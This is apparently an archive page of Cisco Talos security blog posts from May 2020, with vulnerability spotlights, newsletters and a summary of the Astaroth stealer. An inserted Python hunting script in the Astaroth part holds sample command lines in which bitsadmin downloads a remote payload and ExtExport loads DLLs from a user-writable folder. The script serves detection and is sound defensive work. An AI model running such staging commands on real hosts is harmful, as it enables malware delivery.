Friday, May 29, 2020

Threat Roundup for May 22 to May 29


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 22 and May 29. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, May 28, 2020

Threat Source newsletter for May 28, 2020


Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

We need to start things off by wishing a Happy Birthday to Beers with Talos! The first episode was released on May 12, 2017. To celebrate, we have a new episode out this week and are working on another “In Between” for next week.

Send in your questions on Twitter to @TalosSecurity to have them answered on the show. 

Dynamic Data Resolver (DDR) — IDA Plugin 1.0 beta

10/20/20 Update: A new version of this software and associated blog can be found here

Executive summary

Static reverse-engineering in IDA can often be problematic. Certain values are only calculated at run time, which makes it difficult to understand what a given basic block is doing. If you try to perform dynamic analysis by debugging a piece of malware, the malware will often detect the debugger and start behaving differently. Today, Cisco Talos is releasing the 1.0 beta version of Dynamic Data Resolver (DDR) — a plugin for IDA that makes reverse-engineering malware easier. DDR uses instrumentation to resolve dynamic values from the running sample, without attaching a debugger. For the 1.0 release, we have fixed a couple of bugs, ported it to the latest IDA version, added multiple new features, plus a new installer script that automatically resolves all dependencies.

Tuesday, May 26, 2020

Beers with Talos Ep. #82: Talos IR quarterly threat trends

Beers with Talos (BWT) Podcast episode No. 82 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded May 8, 2020

Brad Garnett from Cisco Talos Incident Response joins us today to talk about DFIR, the Talos Quarterly Trends Report, and how a high-speed police chase on reality TV kick-started his DFIR career. That’s not even clickbait, for real. After Brad drops a quick IR trends briefing on us, the crew drills down on some key findings.

We are taking your questions from Twitter so keep sending them for the next "The In-Between" episode — @TalosSecurity #BWT.

Thursday, May 21, 2020

Threat Source newsletter for May 21, 2020


Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

Beers with Talos chugs on during quarantine with the latest episode of “The In-Between.” Once again, the hosts talk about everything but security, answering listener questions from Twitter.

The most pressing threat we have this week is WolfRAT, a variant of the DenDroid Android malware. WolfRAT is attempting to exploit users on different messaging apps like Facebook Messenger, WhatsApp and Line — specifically, users in Thailand.

And if you’re really ready to get into the security nitty-gritty, we have a deep dive on a vulnerability some Cisco researchers recently discovered that leaves cars with on-board computers open to attack.

Vulnerability Spotlight: Memory corruption vulnerability in GNU Glibc leaves smart vehicles open to attack

By Sam Dytrych and Jason Royes.

Executive summary


Modern automobiles are complex machines, merging both mechanical and computer systems under one roof. As automobiles become more advanced, additional sensors and devices are added to help the vehicle understand its internal and external environments. These sensors provide drivers with real-time information, connect the vehicle to the global fleet network and, in some cases, actively use and interpret this telemetry data to drive the vehicle.

These vehicles also frequently integrate both mobile and cloud components to improve the end-user experience. Functionality such as vehicle monitoring, remote start/stop, over-the-air-updates and roadside assistance are offered to the end-user as additional services and quality of life improvements.

All these electronic and computer systems introduce a lot of different attack vectors in connected vehicles – Bluetooth, Digital Radio (HD Radio/DAB), USB, CAN bus, Wi-Fi and, in some cases, cellular. And, like any other embedded system, connected vehicles are exposed to cyber attacks and security threats. Some of the threats that connected vehicles face include software vulnerabilities, hardware-based attacks and even remote control of the vehicle. During some recent research, Cisco's Customer Experience Assessment & Penetration Team (CX APT) discovered a memory corruption vulnerability in GNU libc for ARMv7, which leaves Linux ARMv7 systems open to exploitation. This vulnerability is identified as TALOS-2020-1019/CVE-2020-6096.

CX APT represents the integration of experts from the NDS, Neohapsis, and Portcullis acquisitions. This team provides a variety of security assessment and attack simulation services to customers around the globe. The CX APT IoT security practice specializes in identifying vulnerabilities in connected vehicle components. For more on this vulnerability, you can read the full advisory here. CX APT worked with Cisco Talos to disclose the vulnerability and the libc library maintainers plan to release an update that fixes this vulnerability in August.

Vulnerability Spotlight: Authentication bypass vulnerability in some Epson projectors

Yuri Kramarz of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

The Epson EB-1470UI Projector contains an authentication bypass vulnerability in its web control functionality. This projector allows users to control it over the web. However, an adversary could trick a user into opening a specifically crafted web page, which would allow the attacker to bypass authentication and give them full read/write configuration access.

Cisco Talos is disclosing this vulnerability after Epson did not patch it per Cisco’s 90-day deadline. After initially acknowledging receipt of the issue, Talos was unable to get a reply from the vendor to any follow-up requests. Update: Epson has patched this issue in October 2020, please click here for the patch and the list of impacted devices. Read more about the Cisco vulnerability disclosure policy here.

Tuesday, May 19, 2020

The wolf is back...




By Warren Mercer, Paul Rascagneres and Vitor Ventura.

News summary

  • Thai Android devices and users are being targeted by a modified version of DenDroid we are calling "WolfRAT," now targeting messaging apps like WhatsApp, Facebook Messenger and Line.
  • We assess with high confidence that this modified version is operated by the infamous Wolf Research.
  • This actor has shown a surprising level of amateur actions, including code overlaps, open-source project copy/paste, classes never being instantiated, unstable packages and unsecured panels.

Monday, May 18, 2020

Beers with Talos Ep. #81: "The In-Between," Vol. 3

Beers with Talos (BWT) Podcast episode No. 81 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded May 1, 2020

Sammi is back and the rest of the crew is here to hang out and chat. As is The In-Between Way — we avoid discussing security at all. These episodes are all about just keeping in touch and having some fun. Despite Joel forgetting his one job on this podcast, we are taking your (sometimes crazy) questions from Twitter on these episodes, so keep sending them for the next "The In-Between" episode — @TalosSecurity #BWT.

Vulnerability Spotlight: Multiple vulnerabilities in Nitro Pro PDF reader

Aleksandar Nikolic and Cory Duplantis of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Cisco Talos recently discovered two code execution vulnerabilities and an information disclosure flaw in Nitro Pro PDF reader. Nitro PDF allows users to save, read, sign and edit PDFs on their computers. The software contains vulnerabilities that could allow adversaries to carry out a variety of actions.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Nitro PDF to ensure that these issues are resolved and that an update is available for affected customers.

Friday, May 15, 2020

Threat Roundup for May 8 to May 15


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 8 and May 15. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, May 14, 2020

The basics of a ransomware infection as Snake, Maze expands

By Joe Marshall (@ImmortanJo3)



There have recently been several high-profile ransomware campaigns utilizing Maze and Snake malware. From critical medical supply companies, to large logistics firms, many businesses of all sizes have fallen victim to this cybercrime wave.

Threat Source newsletter for May 14, 2020


Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

Our main focus this week is on Astaroth. This is a malware family that has been targeting Brazil with a variety of lures, including COVID-19-themed documents, for the past nine to 12 months. Astaroth implements a robust series of anti-analysis/evasion techniques, among the most thorough we've seen recently. We have the full rundown of the threat and our protections against it.

And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week. 

Tuesday, May 12, 2020

Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel

Marcin “Icewall” Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered a code execution vulnerability in some versions of Microsoft Excel. An attacker could exploit this vulnerability by tricking the victim into opening a specially crafted Excel file, triggering a use-after-free condition and allowing them to execute arbitrary code on the victim machine.

Microsoft disclosed and patched this bug as part of their monthly security update Tuesday. For more on their updates, read the full blog here.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.

Microsoft Patch Tuesday — May 2020: Vulnerability disclosures and Snort coverage

By Jon Munshaw. 

Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 111 vulnerabilities. Fifteen of the flaws Microsoft disclosed are considered critical. There are also 95 "important" vulnerabilities and six low- and moderate-severity vulnerabilities each.

Cisco Talos specifically disclosed CVE-2020-0901, a code execution vulnerability in Excel. This month’s security update also covers security issues in a variety of Microsoft services and software, including SharePoint, Media Foundation and the Chakra scripting engine.

Talos also released a new set of SNORTⓇ rules that provide coverage for some of these vulnerabilities. For more, check out the full Snort rule advisory here.

Vulnerability Spotlight: Remote code execution vulnerabilities in Adobe Acrobat Reader

Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Cisco Talos recently discovered two remote code execution vulnerabilities in Adobe Acrobat Reader. Acrobat supports a number of features, including the ability to process embedded JavaScript. These flaws specifically exist in the way the software handles the destruction of annotations from inside event handlers. An attacker could trigger these vulnerabilities by tricking a user into opening a malicious file or web page. The adversary could then use that to obtain the ability to execute arbitrary code on the victim machine.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Monday, May 11, 2020

Threat Spotlight: Astaroth — Maze of obfuscation and evasion reveals dark stealer

By Nick Biasini, Edmund Brumaghin and Nick Lister.
  • Cisco Talos is detailing an information stealer, Astaroth, that has been targeting Brazil with a variety of lures, including COVID-19 for the past nine to 12 months.
  • Complex maze of obfuscation and anti-analysis/evasion techniques implemented by Astaroth inhibit both detection and analysis of the malware family.
  • Creative use of YouTube channel descriptions for encoded and encrypted command and control communications (C2) implemented by Astaroth.

What's new?

  • Astaroth implements a robust series of anti-analysis/evasion techniques, among the most thorough we've seen recently.
  • Astaroth is effective at evading detection and ensuring, with reasonable certainty, that it is only being installed on systems in Brazil and not on sandboxes and researchers systems.
  • Novel use of YouTube channels for C2 helps evade detection, by leveraging a commonly used service on commonly used ports.

How did it work?

  • The user receives an email message that has an effective lure, in this campaign all emails were in Portuguese and targeted Brazilian users.
  • The user clicks a link in the email, which directs the user to an actor-owned server.
  • Initial payload (ZIP file with LNK file) downloaded from Google infrastructure.
  • Multiple tiers of obfuscation implemented before LoLBins (ExtExport/Bitsadmin) used to further infection.
  • Extensive anti-analysis/evasion checks done before Astaroth payload delivered.
  • Encoded and encrypted C2 domains pulled from YouTube channel descriptions.
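The chain above leans on two LoLBins, Bitsadmin and ExtExport, to stage the payload, and that stage is where a defender with process-creation telemetry gets a clean detection opportunity. The following is an added example (it is not code from the Talos post, and Talos did not publish these rules): a small hunt over constructed Sysmon-style process-creation events that flags bitsadmin pulling from a remote URL and ExtExport.exe being pointed at a user-writable directory. Assumptions not taken from the post: the key="value" log format, the sample events, the list of trusted directories, and the ExtExport behaviour relied on (as documented in LOLBAS, it loads DLLs such as mshtml.dll from the directory passed as its first argument, which is why an untrusted directory is the signal).

```python
import re
from dataclasses import dataclass

# Constructed Sysmon Event ID 1-style events (key="value" pairs). Not real telemetry.
CONSTRUCTED_EVENTS = [
    # benign: the BITS service itself, not the bitsadmin client
    'Image="C:\\Windows\\System32\\svchost.exe" CommandLine="svchost.exe -k netsvcs -p -s BITS" ParentImage="C:\\Windows\\System32\\services.exe"',
    # suspicious: bitsadmin used to download a remote payload (URL is a documentation address)
    'Image="C:\\Windows\\System32\\bitsadmin.exe" CommandLine="bitsadmin /transfer stage /download /priority high http://198.51.100.10/r.bin C:\\Users\\Public\\r.bin" ParentImage="C:\\Windows\\System32\\cmd.exe"',
    # suspicious: ExtExport.exe pointed at a user-writable directory (assumed DLL-load location)
    'Image="C:\\Program Files\\Internet Explorer\\ExtExport.exe" CommandLine="ExtExport.exe C:\\Users\\Public\\Libraries a b" ParentImage="C:\\Windows\\System32\\cmd.exe"',
    # benign-looking: bitsadmin listing jobs, no transfer, no URL
    'Image="C:\\Windows\\System32\\bitsadmin.exe" CommandLine="bitsadmin /list /allusers" ParentImage="C:\\Windows\\System32\\cmd.exe"',
]

KV_RE = re.compile(r'(\w+)="([^"]*)"')
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Assumed trusted roots: a DLL directory under these is treated as expected.
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


@dataclass
class Finding:
    rule: str
    image: str
    command_line: str


def parse_event(line: str) -> dict:
    """Turn one key="value" event line into a dict."""
    return {k: v for k, v in KV_RE.findall(line)}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_bitsadmin(ev: dict):
    """bitsadmin /transfer with an http(s) source is a download, not a job listing."""
    if basename(ev.get("Image", "")) != "bitsadmin.exe":
        return None
    cl = ev.get("CommandLine", "")
    if "/transfer" in cl.lower() and URL_RE.search(cl):
        return Finding("bitsadmin_remote_transfer", ev["Image"], cl)
    return None


def check_extexport(ev: dict):
    """ExtExport.exe whose first positional argument (the DLL directory) is untrusted."""
    if basename(ev.get("Image", "")) != "extexport.exe":
        return None
    cl = ev.get("CommandLine", "")
    for arg in cl.split()[1:]:          # skip the program name
        if arg.startswith("/"):         # ignore switches
            continue
        if not arg.lower().startswith(TRUSTED_DIRS):
            return Finding("extexport_untrusted_dll_dir", ev["Image"], cl)
        break                           # first positional argument decides
    return None


RULES = (check_bitsadmin, check_extexport)


def hunt(lines) -> list:
    """Run every rule over every event and collect findings in event order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for rule in RULES:
            f = rule(ev)
            if f is not None:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in hunt(CONSTRUCTED_EVENTS):
        print(f"{f.rule}: {f.command_line}")
```

Both rules key on the command line rather than the image alone, because bitsadmin and ExtExport are legitimately present on every Windows host; the parent process (cmd.exe spawned from a LNK, in this campaign) is a useful second signal to add once the rule is deployed against real telemetry.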

So what?

  • Astaroth is another example of the level of sophistication crimeware is consistently achieving.
  • This level of anti-analysis/evasion should be noted, as the likelihood of this spreading beyond just Brazil is high.
  • Organizations need to be prepared for these evasive and effective information stealers and prepared to defend against the sophisticated attack.
  • Another example of how most adversaries are using COVID-19 themed campaigns to increase effectiveness.

Friday, May 8, 2020

Threat Roundup for May 1 to May 8


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 1 and May 8. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, May 7, 2020

Threat Source newsletter for May 7, 2020


Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week. 

With all of us working from home, Beers with Talos episodes are coming out faster than ever. This week, we have an actual episode with security discussions rather than the “Cats” movie, including the importance of split-tunneling.  

There are also two Vulnerability Spotlights out alerting users to bugs in 3S CODESYS and Accusoft ImageGear.

And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week. 

Wednesday, May 6, 2020

Beers with Talos Ep. #80: Working securely in a new (not yet) normal

Beers with Talos (BWT) Podcast episode No. 80 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded April 24, 2020

Matt isn’t with us today, but the rest of the crew discusses some current security issues in our new work-from-home environment, including some better-than-just-the-basics advice on how to protect yourself and your organization’s data. We go a bit more in-depth on VPN and explain how VPNs work, how they protect you, and more importantly, how they DON’T protect you. The key takeaway of this podcast, however, is that we need to start a campaign to formally recognize the legitimacy of Social Mulligans (this counts as a trademark, right?).

Send us your questions for the next "The In-Between" episode — @TalosSecurity #BWT.

Vulnerability Spotlight: Code execution vulnerability in 3S CODESYS


Carl Hurd of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered an exploitable code execution vulnerability in 3S’ CODESYS Control SoftPLC runtime system. The system allows any embedded or PC device to be turned into an IEC 61131-3-compliant industrial controller. A specific task in this system contains a code execution vulnerability that an attacker could exploit by sending a malicious packet to the victim machine.

In accordance with our coordinated disclosure policy, Cisco Talos worked with 3S to ensure that this issue is resolved and that an update is available for affected customers.

Tuesday, May 5, 2020

Vulnerability Spotlight: Multiple code execution vulnerabilities in Accusoft ImageGear

Emmanuel Tacheau of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Cisco Talos recently discovered four code execution vulnerabilities in Accusoft ImageGear. The ImageGear library is a document-imaging developer toolkit to assist users with image conversion, creation, editing and more. There are vulnerabilities in certain functions of ImageGear that could allow an attacker to execute code on the victim machine.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Accusoft to ensure that these issues are resolved and that an update is available for affected customers.

Friday, May 1, 2020

Threat Roundup for April 24 to May 1


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 24 and May 1. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.